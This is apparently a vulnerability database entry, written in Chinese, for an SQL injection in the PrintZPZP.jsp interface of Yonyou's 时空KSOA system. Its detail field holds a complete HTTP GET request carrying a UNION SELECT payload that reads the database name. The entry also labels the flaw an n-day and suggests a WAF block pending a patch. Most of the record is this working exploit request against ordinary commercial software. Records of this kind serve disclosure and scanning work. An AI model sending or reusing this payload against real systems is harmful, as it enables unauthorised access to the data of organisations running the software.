vendor = "用友"
name = "用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/kp/PrintZPZP.jsp"
detail = "GET /kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+--+ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close"
fix = "WAF封禁路路径，等待发布补丁"
date = "0731"
label = "nday"
